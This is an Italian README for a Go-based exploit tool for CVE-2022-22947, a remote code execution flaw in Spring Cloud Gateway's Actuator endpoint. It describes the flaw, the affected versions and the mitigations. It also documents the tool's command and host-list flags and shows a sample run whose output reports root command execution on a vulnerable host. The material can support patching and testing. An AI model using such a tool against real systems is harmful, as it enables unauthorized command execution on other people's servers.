
Exploit basato su Go per CVE-2022-22947, che consente l'esecuzione remota di codice su istanze vulnerabili di Spring Cloud Gateway tramite richieste actuator appositamente predisposte.
Spring Cloud Gateway è un nuovo progetto di Spring Cloud, che mira a sostituire Netflix Zuul. È sviluppato basandosi su Spring5.0+, SpringBoot2.0+, WebFlux (basato sul framework di comunicazione reattiva ad alte prestazioni Netty con modello asincrono non bloccante) e altre tecnologie. Le prestazioni sono superiori a Zuul; secondo test ufficiali, Gateway è 1,6 volte più veloce di Zuul. Mira a fornire un modo semplice ed efficace di gestione unificata delle rotte API per l'architettura a microservizi. La vulnerabilità di esecuzione remota di codice in Spring Cloud Gateway (CVE-2022-22947) si verifica nell'endpoint Actuator dell'applicazione Spring Cloud Gateway, che è vulnerabile a iniezione di codice quando è abilitato, esposto e non protetto. Un attaccante può sfruttare questa vulnerabilità per creare richieste malevole che consentono l'esecuzione arbitraria di comandi sull'host remoto. Punteggio CVSS: 9.8, Livello di pericolosità: Critico
CVE-2022-22947
3.1.0 3.0.0 a 3.0.6 Versioni precedenti alla 3.0.0
Gli utenti 3.1.x dovrebbero aggiornare a 3.1.1+ Gli utenti 3.0.x dovrebbero aggiornare a 3.0.7+ Se l'endpoint Actuator non è necessario, può essere disabilitato configurando management.endpoint.gateway.enable: false Se l'endpoint Actuator è necessario, dovrebbe essere protetto utilizzando Spring Security
Questo script è scritto in Golang e compilato per Windows.
-cmd string Esegui comando (default "id") -host string Indirizzo da testare o percorso file (default "http://127.0.0.1:80")

Esempio:
./cve_2022_22947.exe -host "C:\\Users\\Administrator\\Desktop\\hostlist.txt"
>cve_2022_22947.exe -host "C:\\Users\\Administrator\\Desktop\\hostlist.txt"
result: http://127.0.0.1:10089 : {"predicate":"RouteDefinitionRouteLocator$$Lambda$978/705851885","route_id":"hacktest","filters":["[[AddResponseHeader Result = 'uid=0(root) gid=0(root) groups=0(root)\n'], order = 1]"],"uri": "http://example.com:80","order":0}
vulnerable host:
http://127.0.0.1:10089
https://nosec.org/home/detail/4971.html https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947